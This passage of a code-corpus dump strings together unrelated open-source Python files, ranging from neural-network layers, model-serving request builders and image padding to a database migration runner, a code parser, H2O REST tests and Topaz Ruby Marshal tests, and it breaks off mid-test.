@register_act_fn(name="leaky_relu")
class LeakyReLU(nn.LeakyReLU):
"""
Applies a leaky relu function. See `Rectifier Nonlinearities Improve Neural Network Acoustic Models`
for more details.
"""
def __init__(
self, negative_slope: Optional[float] = 1e-2, inplace: Optional[bool] = False
) -> None:
super().__init__(negative_slope=negative_slope, inplace=inplace)
def profile_module(self, input: Tensor) -> Tuple[Tensor, float, float]:
return input, 0.0, 0.0
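# Minimal usage sketch (illustrative only, not part of the layer definition):
# the module behaves exactly like torch.nn.LeakyReLU, and profile_module
# reports zero parameters and zero MACs because the activation has none.
def _example_leaky_relu_usage():
    import torch  # assumed available, since the layer builds on torch.nn

    act = LeakyReLU(negative_slope=0.1, inplace=False)
    x = torch.randn(2, 8)
    y = act(x)                                    # standard leaky-relu forward
    same_x, params, macs = act.profile_module(x)  # returns (input, 0.0, 0.0)
    return y, params, macs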
|
baseline/tf/remote.py | sagnik/baseline | 241 | 11089650 | import numpy as np
from baseline.remote import (
RemoteModelREST,
RemoteModelGRPC,
register_remote,
RemoteRESTClassifier,
RemoteRESTTagger,
RemoteRESTSeq2Seq,
RemoteRESTEmbeddings,
RemoteGRPCClassifier,
RemoteGRPCTagger,
RemoteGRPCSeq2Seq,
RemoteGRPCEmbeddings,
)
class RemoteRESTTensorFlowMixin(RemoteModelREST):
def create_request(self, examples):
inputs = {}
for feature in self.input_keys:
tensor = examples[feature]
if isinstance(tensor, np.ndarray):
inputs[feature] = tensor.tolist()
else:
inputs[feature] = tensor
request = {'signature_name': self.signature, 'inputs': inputs}
return request
@register_remote('http-classify')
class RemoteRESTTensorFlowClassifier(RemoteRESTTensorFlowMixin, RemoteRESTClassifier): pass
@register_remote('http-tagger')
class RemoteRESTTensorFlowTagger(RemoteRESTTensorFlowMixin, RemoteRESTTagger): pass
@register_remote('http-seq2seq')
class RemoteRESTTensorFlowSeq2Seq(RemoteRESTTensorFlowMixin, RemoteRESTSeq2Seq): pass
@register_remote('http-servable-embeddings')
class RemoteRESTTensorFlowEmbeddings(RemoteRESTTensorFlowMixin, RemoteRESTEmbeddings): pass
@register_remote('grpc')
class RemoteGRPCTensorFlowMixin(RemoteModelGRPC): pass
@register_remote('grpc-classify')
class RemoteGRPCTensorFlowClassifier(RemoteGRPCTensorFlowMixin, RemoteGRPCClassifier): pass
@register_remote('grpc-tagger')
class RemoteGRPCTensorFlowTagger(RemoteGRPCTensorFlowMixin, RemoteGRPCTagger): pass
@register_remote('grpc-seq2seq')
class RemoteGRPCTensorFlowSeq2Seq(RemoteGRPCTensorFlowMixin, RemoteGRPCSeq2Seq): pass
@register_remote('grpc-servable-embeddings')
class RemoteGRPCTensorFlowEmbeddings(RemoteGRPCTensorFlowMixin, RemoteGRPCEmbeddings): pass
@register_remote('grpc-preproc')
class RemoteGRPCTensorFlowPreprocMixin(RemoteModelGRPC):
def create_request(self, examples):
# TODO: Remove TF dependency client side
import tensorflow as tf
request = self.predictpb.PredictRequest()
request.model_spec.name = self.name
request.model_spec.signature_name = self.signature
if self.version is not None:
request.model_spec.version.value = self.version
for key in examples:
if key.endswith('lengths'):
shape = examples[key].shape
tensor_proto = tf.contrib.util.make_tensor_proto(examples[key], shape=shape, dtype=tf.int32)
request.inputs[key].CopyFrom(
tensor_proto
)
else:
request.inputs[key].CopyFrom(
tf.contrib.util.make_tensor_proto(examples[key], shape=[len(examples[key]), 1])
)
return request
@register_remote('grpc-preproc-classify')
class RemoteGRPCTensorFlowPreprocClassifier(RemoteGRPCTensorFlowPreprocMixin, RemoteGRPCClassifier): pass
@register_remote('grpc-preproc-tagger')
class RemoteGRPCTensorFlowPreprocTagger(RemoteGRPCTensorFlowPreprocMixin, RemoteGRPCTagger): pass
@register_remote('grpc-preproc-seq2seq')
class RemoteGRPCTensorFlowPreprocSeq2Seq(RemoteGRPCTensorFlowPreprocMixin, RemoteGRPCSeq2Seq): pass
@register_remote('grpc-preproc-servable-embeddings')
class RemoteGRPCTensorFlowPreprocEmbeddings(RemoteGRPCTensorFlowPreprocMixin, RemoteGRPCEmbeddings): pass
@register_remote('http-preproc')
class RemoteRESTTensorFlowPreprocMixin(RemoteModelREST):
def create_request(self, examples):
inputs = {}
if isinstance(examples['tokens'], np.ndarray):
inputs['tokens'] = examples['tokens'].tolist()
else:
inputs['tokens'] = examples['tokens']
for feature in self.input_keys:
if feature.endswith('lengths'):
if isinstance(examples[feature], np.ndarray):
inputs[feature] = examples[feature].tolist()
else:
inputs[feature] = examples[feature]
return {'signature_name': self.signature, 'inputs': inputs}
@register_remote('http-preproc-classify')
class RemoteRESTTensorFlowPreprocClassifier(RemoteRESTTensorFlowPreprocMixin, RemoteRESTClassifier): pass
@register_remote('http-preproc-tagger')
class RemoteRESTTensorFlowPreprocTagger(RemoteRESTTensorFlowPreprocMixin, RemoteRESTTagger): pass
@register_remote('http-preproc-seq2seq')
class RemoteRESTTensorFlowPreprocSeq2Seq(RemoteRESTTensorFlowPreprocMixin, RemoteRESTSeq2Seq): pass
@register_remote('http-preproc-servable-embeddings')
class RemoteRESTTensorFlowPreprocEmbeddings(RemoteRESTTensorFlowPreprocMixin, RemoteRESTEmbeddings): pass
|
ants/utils/pad_image.py | xemio/ANTsPy | 338 | 11089670 |
__all__ = ['pad_image']
import math
from ..core import ants_image as iio
from .. import utils
def pad_image(image, shape=None, pad_width=None, value=0.0, return_padvals=False):
"""
Pad an image to have the given shape or to be isotropic.
Arguments
---------
image : ANTsImage
image to pad
shape : tuple
- if shape is given, the image will be padded in each dimension
until it has this shape
- if shape is not given, the image will be padded along each
dimension to match the largest existing dimension so that it
has isotropic dimension
    pad_width : list of integers or 2-item tuples (one per image dimension)
        amount of padding for each dimension; a (lower, upper) tuple gives the
        padding on either side explicitly, while a single integer is split
        evenly between the lower and upper sides
    value : scalar
value with which image will be padded
Example
-------
>>> import ants
>>> img = ants.image_read(ants.get_data('r16'))
>>> img2 = ants.pad_image(img, shape=(300,300))
>>> mni = ants.image_read(ants.get_data('mni'))
>>> mni2 = ants.pad_image(mni)
>>> mni3 = ants.pad_image(mni, pad_width=[(0,4),(0,4),(0,4)])
>>> mni4 = ants.pad_image(mni, pad_width=(4,4,4))
"""
inpixeltype = image.pixeltype
ndim = image.dimension
if image.pixeltype != 'float':
image = image.clone('float')
if pad_width is None:
if shape is None:
shape = [max(image.shape)] * image.dimension
lower_pad_vals = [math.floor(max(ns-os,0)/2) for os,ns in zip(image.shape, shape)]
upper_pad_vals = [math.ceil(max(ns-os,0)/2) for os,ns in zip(image.shape, shape)]
else:
if shape is not None:
raise ValueError('Cannot give both `shape` and `pad_width`. Pick one!')
if len(pad_width) != image.dimension:
raise ValueError('Must give pad width for each image dimension')
lower_pad_vals = []
upper_pad_vals = []
for p in pad_width:
if isinstance(p, (list, tuple)):
lower_pad_vals.append(p[0])
upper_pad_vals.append(p[1])
else:
lower_pad_vals.append(math.floor(p/2))
upper_pad_vals.append(math.ceil(p/2))
libfn = utils.get_lib_fn('padImageF%i' % ndim)
itkimage = libfn(image.pointer, lower_pad_vals, upper_pad_vals, value)
new_image = iio.ANTsImage(pixeltype='float', dimension=ndim,
components=image.components, pointer=itkimage).clone(inpixeltype)
if return_padvals:
return new_image, lower_pad_vals, upper_pad_vals
else:
return new_image
|
examples/pipeline/app_without_args.py | pichatelli/simple-settings | 213 | 11089701 | from simple_settings import LazySettings
settings = LazySettings(
'first_settings', 'second_settings'
)
print(settings.ONLY_IN_FIRST)
print(settings.ONLY_IN_SECOND)
print(settings.SIMPLE_CONF)
|
conftest.py | jiduque/scikit-fda | 147 | 11089704 | import pytest
# https://github.com/scikit-learn/scikit-learn/issues/8959
import numpy as np
try:
np.set_printoptions(sign=' ')
except TypeError:
pass
collect_ignore = ['setup.py', 'docs/conf.py']
pytest.register_assert_rewrite("skfda")
|
ghidra_9.0/Ghidra/Features/Python/data/jython-2.7.1/Lib/select.py | ChristopherMorrison/ghidra | 577 | 11089709 | # dispatches to _socket for actual implementation
from _socket import (
POLLIN,
POLLOUT,
POLLPRI,
POLLERR,
POLLHUP,
POLLNVAL,
error,
poll,
select)
# backwards compatibility with Jython 2.5
cpython_compatible_select = select
__all__ = [
"POLLIN", "POLLOUT", "POLLPRI", "POLLERR", "POLLHUP", "POLLNVAL",
"error", "poll", "select", "cpython_compatible_select"]
|
atcoder/abc078/b.py | Ashindustry007/competitive-programming | 506 | 11089720 | #!/usr/bin/env python2
# https://abc078.contest.atcoder.jp/tasks/abc078_b
x, y, z = map(int, raw_input().split())
print (x - z) // (y + z)
|
spruned/application/migrations/__init__.py | darosior/spruned | 152 | 11089731 |
import os
def get_version(sql):
table_info = "PRAGMA table_info('migrations')"
from sqlalchemy.exc import ResourceClosedError
try:
if not sql.execute(table_info).fetchall():
return 0
except ResourceClosedError as e:
if 'does not return rows' in str(e):
return 0
version_query = "SELECT version from migrations"
version = sql.execute(version_query).fetchone()
return version and version[0] or 0
def gather_migrations():
current_path = os.path.realpath(__file__).rstrip('__init__.py')
files = os.listdir(current_path)
return {
int(x.replace('migration_', '').replace('.py', '')): current_path + x
for x in files if x.startswith('migration_')
}
def apply_migration(sql, migration):
from importlib.machinery import SourceFileLoader
module = SourceFileLoader('migration_%s' % migration, migration).load_module()
module.migrate(sql)
def run(sql):
version = get_version(sql)
migrations = gather_migrations()
from spruned.application.logging_factory import Logger
Logger.root.debug(
'Database migrations. Current version: %s, migrations available: %s', version, max(migrations.keys())
)
missing_migrations = sorted([x for x in migrations.keys() if x > version])
for migration in missing_migrations:
apply_migration(sql, migrations[migration])
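# Illustrative sketch (not part of this package): each migration lives in this
# directory as 'migration_<N>.py' and must expose a 'migrate(sql)' callable,
# which apply_migration() loads with SourceFileLoader and invokes. The
# statements below are assumptions made only to show that contract; this
# example is not discovered by gather_migrations() because its name does not
# match the 'migration_<N>.py' pattern.
def _example_migrate(sql):
    sql.execute("CREATE TABLE IF NOT EXISTS migrations (version INTEGER)")
    sql.execute("INSERT INTO migrations (version) VALUES (1)")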
|
transpyle/general/parser.py | EraYaN/transpyle | 107 | 11089746 |
"""Definition of parser."""
import collections.abc
import pathlib
import re
import textwrap
import typing as t
from .registry import Registry
from .code_reader import CodeReader
# def remove_trailing_whitespace(code: str) -> str:
# raise NotImplementedError()
def validate_indentation(code: str, path: pathlib.Path = None):
"""Raise error if code isn't consistently indented (either only with spaces, or only with tabs).
Path is optional and used only for diagnostic purposes (i.e. if error happens).
"""
if not isinstance(code, str):
raise TypeError('code must be string but {} given'.format(type(code)))
assert path is None or isinstance(path, pathlib.Path), type(path)
lines = code.splitlines(keepends=True)
whitespace = r'[ \t]*'
mixed_indent = r'( {0}\t{0})|(\t{0} {0})'.format(whitespace)
indent_by_spaces = r'[ ]+'
indent_by_tabs = r'[\t]+'
indented_with_spaces = None # type: t.Optional[bool]
for i, line in enumerate(lines):
# check if indentation is not mixed
if re.match(mixed_indent, line) is not None:
raise ValueError('{}:{} mixed indentation found in {}'.format(
'<string>' if path is None else path, i, repr(line)))
# check if indentation type is consistent
if indented_with_spaces is None:
if re.match(indent_by_spaces, line) is not None:
indented_with_spaces = True
elif re.match(indent_by_tabs, line) is not None:
indented_with_spaces = False
elif indented_with_spaces:
if re.match(indent_by_tabs, line) is not None:
raise ValueError(
'{}:{} after space indent in previous lines, tab indent found in {}'
.format('<string>' if path is None else path, i, repr(line)))
else:
if re.match(indent_by_spaces, line) is not None:
raise ValueError(
'{}:{} after tab indent in previous lines, space indent found in {}'
.format('<string>' if path is None else path, i, repr(line)))
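# Minimal usage sketch (illustrative, not part of the module): consistently
# space-indented code passes silently, while a line that mixes tabs and spaces
# raises ValueError pointing at the offending line.
def _example_validate_indentation():
    validate_indentation('def f():\n    return 1\n')        # only spaces: OK
    try:
        validate_indentation('def f():\n\t  return 1\n')    # tab followed by spaces
    except ValueError as error:
        return error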
class Parser(Registry):
"""Extract abstract representation of syntax from the source code."""
def __init__(self, default_scopes: t.Sequence[t.Tuple[int, t.Optional[int]]] = None):
"""Initialize new Parser instance.
Default scopes, if provided, limit parsing to the given line sections unless the default
        is overridden.
"""
self._code_reader = None
if default_scopes is None:
default_scopes = [(0, None)]
self.default_scopes = default_scopes
def parse(self, code: str, path: pathlib.Path = None,
scopes: t.Sequence[t.Tuple[int, t.Optional[int]]] = None, dedent: bool = True):
"""Parse given code into a language-specific AST.
If path is provided, use it to guide the parser if necessary, as well as for diagnostics.
"""
assert isinstance(code, str), type(code)
assert path is None or isinstance(path, pathlib.Path), type(path)
assert scopes is None or isinstance(scopes, collections.abc.Sequence), type(scopes)
if scopes is None:
scopes = self.default_scopes
parsed_scopes = []
for begin, end in scopes:
assert isinstance(begin, int), type(begin)
assert end is None or isinstance(end, int), type(end)
if begin == 0 and end is None:
code_scope = code
else:
lines = code.splitlines(keepends=True)
if end is None:
end = len(lines)
code_scope = ''.join(lines[begin:end])
validate_indentation(code_scope, path)
if dedent:
code_scope = textwrap.dedent(code_scope)
parsed_scope = self._parse_scope(code_scope, path)
parsed_scopes.append(parsed_scope)
if len(scopes) == 1:
return parsed_scopes[0]
return self._join_scopes(parsed_scopes)
def _parse_scope(self, code: str, path: pathlib.Path = None):
raise NotImplementedError('{} is abstract'.format(type(self).__name__))
def _join_scopes(self, parsed_scopes):
raise NotImplementedError('{} cannot join multiple parsed scopes'
.format(type(self).__name__))
def parse_file(self, path: pathlib.Path):
"""Read and parse a given file."""
if self._code_reader is None:
self._code_reader = CodeReader()
code = self._code_reader.read_file(path)
return self.parse(code, path, dedent=False)
|
conda-recipe/run_test.py | ktanishqk/py-earth | 360 | 11089771 |
import pyearth
import nose
import os
pyearth_dir = os.path.dirname(
os.path.abspath(pyearth.__file__))
os.chdir(pyearth_dir)
nose.run(module=pyearth)
|
py/rest_tests/test_metadata.py | ahmedengu/h2o-3 | 6,098 | 11089857 | import h2o
import h2o_test_utils
def test(a_node, pp):
####################################
# test schemas collection GET
if h2o_test_utils.isVerbose(): print('Testing /Metadata/schemas. . .')
schemas = a_node.schemas(timeoutSecs=240)
assert 'schemas' in schemas, "FAIL: failed to find 'schemas' field in output of /Metadata/schemas: " + repr(schemas)
assert type(schemas['schemas']) is list, "'schemas' field in output of /Metadata/schemas is not a list: " + repr(schemas)
assert len(schemas['schemas']) > 0, "'schemas' field in output of /Metadata/schemas is empty: " + repr(schemas)
if h2o_test_utils.isVerboser():
print('Schemas: ')
pp.pprint(schemas)
####################################
# test schemas individual GET
if h2o_test_utils.isVerbose(): print('Testing /Metadata/schemas/FrameV3. . .')
schemas = a_node.schema(schemaname='FrameV3', timeoutSecs=240)
assert 'schemas' in schemas, "FAIL: failed to find 'schemas' field in output of /Metadata/schemas/FrameV3: " + repr(schemas)
assert type(schemas['schemas']) is list, "'schemas' field in output of /Metadata/schemas/FrameV3 is not a list: " + repr(schemas)
assert len(schemas['schemas']) == 1, "'schemas' field in output of /Metadata/schemas/FrameV3 has an unexpected length: " + repr(schemas)
if h2o_test_utils.isVerboser():
print('Schemas: ')
pp.pprint(schemas)
#########################
# test Metadata/endpoints
if h2o_test_utils.isVerbose(): print('Testing /Metadata/endpoints. . .')
endpoints = a_node.endpoints()
assert 'routes' in endpoints, "FAIL: failed to find routes in the endpoints result."
assert type(endpoints['routes']) is list, "FAIL: routes in the endpoints result is not a list."
assert len(endpoints['routes']) > 0, "FAIL: routes list in the endpoints result is empty."
assert type(endpoints['routes'][0]) is dict, "FAIL: routes[0] in the endpoints result is not a dict."
assert 'input_schema' in endpoints['routes'][0], "FAIL: routes[0] in the endpoints result does not have an 'input_schema' field."
#########################
# test Metadata/schemas
if h2o_test_utils.isVerbose(): print('Testing /Metadata/schemas. . .')
schemas = a_node.schemas()
assert 'schemas' in schemas, "FAIL: failed to find schemas in the schemas result."
assert type(schemas['schemas']) is list, "FAIL: schemas in the schemas result is not a list."
assert len(schemas['schemas']) > 0, "FAIL: schemas list in the schemas result is empty."
assert type(schemas['schemas'][0]) is dict, "FAIL: schemas[0] in the schemas result is not a dict."
assert 'fields' in schemas['schemas'][0], "FAIL: schemas[0] in the schemas result does not have an 'fields' field."
|
tests/modules/test_marshal.py | ruby-compiler-survey/topaz | 241 | 11089858 | from ..base import BaseTopazTest
class TestMarshal(BaseTopazTest):
def test_version_constants(self, space):
w_res = space.execute("return Marshal::MAJOR_VERSION")
assert space.int_w(w_res) == 4
w_res = space.execute("return Marshal::MINOR_VERSION")
assert space.int_w(w_res) == 8
w_res = space.execute("return Marshal.dump('test')[0].ord")
assert space.int_w(w_res) == 4
w_res = space.execute("return Marshal.dump('test')[1].ord")
assert space.int_w(w_res) == 8
def test_dump_constants(self, space):
w_res = space.execute("return Marshal.dump(nil)")
assert space.str_w(w_res) == "\x04\b0"
w_res = space.execute("return Marshal.dump(true)")
assert space.str_w(w_res) == "\x04\bT"
w_res = space.execute("return Marshal.dump(false)")
assert space.str_w(w_res) == "\x04\bF"
def test_load_constants(self, space):
w_res = space.execute("return Marshal.load('\x04\b0')")
assert w_res == space.w_nil
w_res = space.execute("return Marshal.load('\x04\bT')")
assert w_res == space.w_true
w_res = space.execute("return Marshal.load('\x04\bF')")
assert w_res == space.w_false
def test_constants(self, space):
w_res = space.execute("return Marshal.load(Marshal.dump(nil))")
assert w_res == space.w_nil
w_res = space.execute("return Marshal.load(Marshal.dump(true))")
assert w_res == space.w_true
w_res = space.execute("return Marshal.load(Marshal.dump(false))")
assert w_res == space.w_false
def test_dump_tiny_integer(self, space):
w_res = space.execute("return Marshal.dump(5)")
assert space.str_w(w_res) == "\x04\bi\n"
w_res = space.execute("return Marshal.dump(100)")
assert space.str_w(w_res) == "\x04\bii"
w_res = space.execute("return Marshal.dump(0)")
assert space.str_w(w_res) == "\x04\bi\x00"
w_res = space.execute("return Marshal.dump(-1)")
assert space.str_w(w_res) == "\x04\bi\xFA"
w_res = space.execute("return Marshal.dump(-123)")
assert space.str_w(w_res) == "\x04\bi\x80"
w_res = space.execute("return Marshal.dump(122)")
assert space.str_w(w_res) == "\x04\bi\x7F"
def test_load_tiny_integer(self, space):
w_res = space.execute("return Marshal.load('\x04\bi\n')")
assert space.int_w(w_res) == 5
w_res = space.execute("return Marshal.load('\x04\bii')")
assert space.int_w(w_res) == 100
# w_res = space.execute('return Marshal.load("\x04\bi\x00")')
w_res = space.execute('return Marshal.load(Marshal.dump(0))')
assert space.int_w(w_res) == 0
w_res = space.execute("return Marshal.load('\x04\bi\xFA')")
assert space.int_w(w_res) == -1
w_res = space.execute("return Marshal.load('\x04\bi\x80')")
assert space.int_w(w_res) == -123
w_res = space.execute("return Marshal.load('\x04\bi\x7F')")
assert space.int_w(w_res) == 122
def test_dump_array(self, space):
w_res = space.execute("return Marshal.dump([])")
assert space.str_w(w_res) == "\x04\b[\x00"
w_res = space.execute("return Marshal.dump([nil])")
assert space.str_w(w_res) == "\x04\b[\x060"
w_res = space.execute("return Marshal.dump([nil, true, false])")
assert space.str_w(w_res) == "\x04\b[\b0TF"
w_res = space.execute("return Marshal.dump([1, 2, 3])")
assert space.str_w(w_res) == "\x04\b[\x08i\x06i\x07i\x08"
w_res = space.execute("return Marshal.dump([1, [2, 3], 4])")
assert space.str_w(w_res) == "\x04\b[\bi\x06[\ai\ai\bi\t"
w_res = space.execute("return Marshal.dump([:foo, :bar])")
assert space.str_w(w_res) == "\x04\b[\a:\bfoo:\bbar"
def test_load_array(self, space):
# w_res = space.execute("return Marshal.load('\x04\b[\x00')")
w_res = space.execute("return Marshal.load(Marshal.dump([]))")
assert self.unwrap(space, w_res) == []
w_res = space.execute("return Marshal.load('\x04\b[\x060')")
assert self.unwrap(space, w_res) == [None]
w_res = space.execute("return Marshal.load('\x04\b[\b0TF')")
assert self.unwrap(space, w_res) == [None, True, False]
w_res = space.execute("return Marshal.load('\x04\b[\x08i\x06i\x07i\x08')")
assert self.unwrap(space, w_res) == [1, 2, 3]
w_res = space.execute("return Marshal.load('\x04\b[\bi\x06[\ai\ai\bi\t')")
assert self.unwrap(space, w_res) == [1, [2, 3], 4]
w_res = space.execute("return Marshal.load('\x04\b[\a:\bfoo:\bbar')")
assert self.unwrap(space, w_res) == ["foo", "bar"]
def test_dump_symbol(self, space):
w_res = space.execute("return Marshal.dump(:abc)")
assert space.str_w(w_res) == "\x04\b:\babc"
w_res = space.execute("return Marshal.dump(('hello' * 25).to_sym)")
assert space.str_w(w_res) == "\x04\b:\x01}" + "hello" * 25
w_res = space.execute("return Marshal.dump(('hello' * 100).to_sym)")
assert space.str_w(w_res) == "\x04\b:\x02\xF4\x01" + "hello" * 100
def test_load_symbol(self, space):
w_res = space.execute("return Marshal.load('\x04\b:\babc')")
assert space.symbol_w(w_res) == "abc"
w_res = space.execute("return Marshal.load('\x04\b:\x01}' + 'hello' * 25)")
assert space.symbol_w(w_res) == "hello" * 25
def test_dump_hash(self, space):
w_res = space.execute("return Marshal.dump({})")
assert space.str_w(w_res) == "\x04\b{\x00"
w_res = space.execute("return Marshal.dump({1 => 2, 3 => 4})")
assert self.unwrap(space, w_res) == "\x04\b{\ai\x06i\ai\bi\t"
w_res = space.execute("return Marshal.dump({1 => {2 => 3}, 4 => 5})")
assert self.unwrap(space, w_res) == "\x04\b{\ai\x06{\x06i\ai\bi\ti\n"
w_res = space.execute("return Marshal.dump({1234 => {23456 => 3456789}, 4 => 5})")
assert self.unwrap(space, w_res) == "\x04\b{\ai\x02\xD2\x04{\x06i\x02\xA0[i\x03\x15\xBF4i\ti\n"
def test_load_hash(self, space):
# w_res = space.execute("return Marshal.load('\x04\b{\x00')")
w_res = space.execute("return Marshal.load(Marshal.dump({}))")
assert self.unwrap(space, w_res) == {}
w_res = space.execute("return Marshal.load('\x04\b{\ai\x06i\ai\bi\t')")
assert self.unwrap(space, w_res) == {1: 2, 3: 4}
w_res = space.execute("return Marshal.load('\x04\b{\ai\x06{\x06i\ai\bi\ti\n')")
assert self.unwrap(space, w_res) == {1: {2: 3}, 4: 5}
w_res = space.execute("return Marshal.load('\x04\b{\ai\x02\xD2\x04{\x06i\x02\xA0[i\x03\x15\xBF4i\ti\n')")
assert self.unwrap(space, w_res) == {1234: {23456: 3456789}, 4: 5}
def test_dump_integer(self, space):
w_res = space.execute("return Marshal.dump(123)")
assert space.str_w(w_res) == "\x04\bi\x01{"
w_res = space.execute("return Marshal.dump(255)")
assert space.str_w(w_res) == "\x04\bi\x01\xFF"
w_res = space.execute("return Marshal.dump(256)")
assert space.str_w(w_res) == "\x04\bi\x02\x00\x01"
w_res = space.execute("return Marshal.dump(2 ** 16 - 2)")
assert space.str_w(w_res) == "\x04\bi\x02\xFE\xFF"
w_res = space.execute("return Marshal.dump(2 ** 16 - 1)")
assert space.str_w(w_res) == "\x04\bi\x02\xFF\xFF"
w_res = space.execute("return Marshal.dump(2 ** 16)")
assert space.str_w(w_res) == "\x04\bi\x03\x00\x00\x01"
w_res = space.execute("return Marshal.dump(2 ** 16 + 1)")
assert space.str_w(w_res) == "\x04\bi\x03\x01\x00\x01"
w_res = space.execute("return Marshal.dump(2 ** 30 - 1)")
assert space.str_w(w_res) == "\x04\bi\x04\xFF\xFF\xFF?"
# TODO: test numbers that are too big (they give a warning and inf)
def test_load_integer(self, space):
w_res = space.execute("return Marshal.load('\x04\bi\x01{')")
assert space.int_w(w_res) == 123
w_res = space.execute("return Marshal.load('\x04\bi\x01\xFF')")
assert space.int_w(w_res) == 255
# w_res = space.execute("return Marshal.load('\x04\bi\x02\x00\x01')")
w_res = space.execute("return Marshal.load(Marshal.dump(256))")
assert space.int_w(w_res) == 256
w_res = space.execute("return Marshal.load('\x04\bi\x02\xFE\xFF')")
assert space.int_w(w_res) == 2 ** 16 - 2
w_res = space.execute("return Marshal.load('\x04\bi\x02\xFF\xFF')")
assert space.int_w(w_res) == 2 ** 16 - 1
# w_res = space.execute("return Marshal.load('\x04\bi\x03\x00\x00\x01')")
w_res = space.execute("return Marshal.load(Marshal.dump(2 ** 16))")
assert space.int_w(w_res) == 2 ** 16
# w_res = space.execute("return Marshal.load('\x04\bi\x03\x01\x00\x01')")
w_res = space.execute("return Marshal.load(Marshal.dump(2 ** 16 + 1))")
assert space.int_w(w_res) == 2 ** 16 + 1
w_res = space.execute("return Marshal.load('\x04\bi\x04\xFF\xFF\xFF?')")
assert space.int_w(w_res) == 2 ** 30 - 1
def test_dump_negative_integer(self, space):
w_res = space.execute("return Marshal.dump(-1)")
assert space.str_w(w_res) == "\x04\bi\xFA"
w_res = space.execute("return Marshal.dump(-123)")
assert space.str_w(w_res) == "\x04\bi\x80"
w_res = space.execute("return Marshal.dump(-124)")
assert space.str_w(w_res) == "\x04\bi\xFF\x84"
w_res = space.execute("return Marshal.dump(-256)")
assert space.str_w(w_res) == "\x04\bi\xFF\x00"
w_res = space.execute("return Marshal.dump(-257)")
assert space.str_w(w_res) == "\x04\bi\xFE\xFF\xFE"
w_res = space.execute("return Marshal.dump(-(2 ** 30))")
assert space.str_w(w_res) == "\x04\bi\xFC\x00\x00\x00\xC0"
def test_load_negative_integer(self, space):
w_res = space.execute("return Marshal.load('\x04\bi\xFA')")
assert space.int_w(w_res) == -1
w_res = space.execute("return Marshal.load('\x04\bi\x80')")
assert space.int_w(w_res) == -123
w_res = space.execute("return Marshal.load('\x04\bi\xFF\x84')")
assert space.int_w(w_res) == -124
# w_res = space.execute("return Marshal.load('\x04\bi\xFF\x00')")
w_res = space.execute("return Marshal.load(Marshal.dump(-256))")
assert space.int_w(w_res) == -256
w_res = space.execute("return Marshal.load('\x04\bi\xFE\xFF\xFE')")
assert space.int_w(w_res) == -257
# w_res = space.execute("return Marshal.load('\x04\bi\xFE\x00\x00')")
w_res = space.execute("return Marshal.load(Marshal.dump(-(2 ** 16)))")
assert space.int_w(w_res) == -(2 ** 16)
w_res = space.execute("return Marshal.load('\x04\bi\xFD\xFF\xFF\xFE')")
assert space.int_w(w_res) == -(2 ** 16 + 1)
# w_res = space.execute("return Marshal.load('\x04\bi\xFC\x00\x00\x00')")
w_res = space.execute("return Marshal.load(Marshal.dump(-(2 ** 24)))")
assert space.int_w(w_res) == -(2 ** 24)
w_res = space.execute("return Marshal.load('\x04\bi\xFC\xFF\xFF\xFF\xFE')")
assert space.int_w(w_res) == -(2 ** 24 + 1)
# w_res = space.execute("return Marshal.load('\x04\bi\xFC\x00\x00\x00\xC0')")
w_res = space.execute("return Marshal.load(Marshal.dump(-(2 ** 30)))")
assert space.int_w(w_res) == -(2 ** 30)
def test_dump_float(self, space):
w_res = space.execute("return Marshal.dump(0.0)")
assert space.str_w(w_res) == "\x04\bf\x060"
w_res = space.execute("return Marshal.dump(0.1)")
assert space.str_w(w_res) == "\x04\bf\b0.1"
w_res = space.execute("return Marshal.dump(1.0)")
assert space.str_w(w_res) == "\x04\bf\x061"
w_res = space.execute("return Marshal.dump(1.1)")
assert space.str_w(w_res) == "\x04\bf\b1.1"
w_res = space.execute("return Marshal.dump(1.001)")
assert space.str_w(w_res) == "\x04\bf\n1.001"
# w_res = space.execute("return Marshal.dump(123456789.123456789)")
# assert space.str_w(w_res) == "\x04\bf\x17123456789.12345679"
# w_res = space.execute("return Marshal.dump(-123456789.123456789)")
# assert space.str_w(w_res) == "\x04\bf\x18-123456789.12345679"
# w_res = space.execute("return Marshal.dump(-0.0)")
# assert space.str_w(w_res) == "\x04\bf\a-0"
def test_load_float(self, space):
w_res = space.execute("return Marshal.load('\x04\bf\x060')")
assert space.float_w(w_res) == 0.0
w_res = space.execute("return Marshal.load('\x04\bf\b0.1')")
assert space.float_w(w_res) == 0.1
w_res = space.execute("return Marshal.load('\x04\bf\x061')")
assert space.float_w(w_res) == 1.0
w_res = space.execute("return Marshal.load('\x04\bf\b1.1')")
assert space.float_w(w_res) == 1.1
w_res = space.execute("return Marshal.load('\x04\bf\n1.001')")
assert space.float_w(w_res) == 1.001
# w_res = space.execute("return Marshal.load('\x04\bf\x17123456789.12345679')")
# assert space.float_w(w_res) == 123456789.123456789
# w_res = space.execute("return Marshal.load('\x04\bf\x18-123456789.12345679')")
# assert space.float_w(w_res) == -123456789.123456789
# w_res = space.execute("return Marshal.load('\x04\bf\a-0')")
# assert repr(space.float_w(w_res)) == repr(-0.0)
def test_dump_string(self, space):
w_res = space.execute("return Marshal.dump('')")
assert space.str_w(w_res) == "\x04\bI\"\x00\x06:\x06ET"
w_res = space.execute("return Marshal.dump('abc')")
assert space.str_w(w_res) == "\x04\bI\"\babc\x06:\x06ET"
w_res = space.execute("return Marshal.dump('i am a longer string')")
assert space.str_w(w_res) == "\x04\bI\"\x19i am a longer string\x06:\x06ET"
def test_load_string(self, space):
# w_res = space.execute("return Marshal.load('\x04\bI\"\x00\x06:\x06ET')")
w_res = space.execute("return Marshal.load(Marshal.dump(''))")
assert space.str_w(w_res) == ""
w_res = space.execute("return Marshal.load('\x04\bI\"\babc\x06:\x06ET')")
assert space.str_w(w_res) == "abc"
w_res = space.execute("return Marshal.load('\x04\bI\"\x19i am a longer string\x06:\x06ET')")
assert space.str_w(w_res) == "i am a longer string"
def test_array(self, space):
w_res = space.execute("return Marshal.load(Marshal.dump([1, 2, 3]))")
assert self.unwrap(space, w_res) == [1, 2, 3]
w_res = space.execute("return Marshal.load(Marshal.dump([1, [2, 3], 4]))")
assert self.unwrap(space, w_res) == [1, [2, 3], 4]
w_res = space.execute("return Marshal.load(Marshal.dump([130, [2, 3], 4]))")
assert self.unwrap(space, w_res) == [130, [2, 3], 4]
w_res = space.execute("return Marshal.load(Marshal.dump([-10000, [2, 123456], -9000]))")
assert self.unwrap(space, w_res) == [-10000, [2, 123456], -9000]
w_res = space.execute("return Marshal.load(Marshal.dump([:foo, :bar]))")
assert self.unwrap(space, w_res) == ["foo", "bar"]
w_res = space.execute("return Marshal.load(Marshal.dump(['foo', 'bar']))")
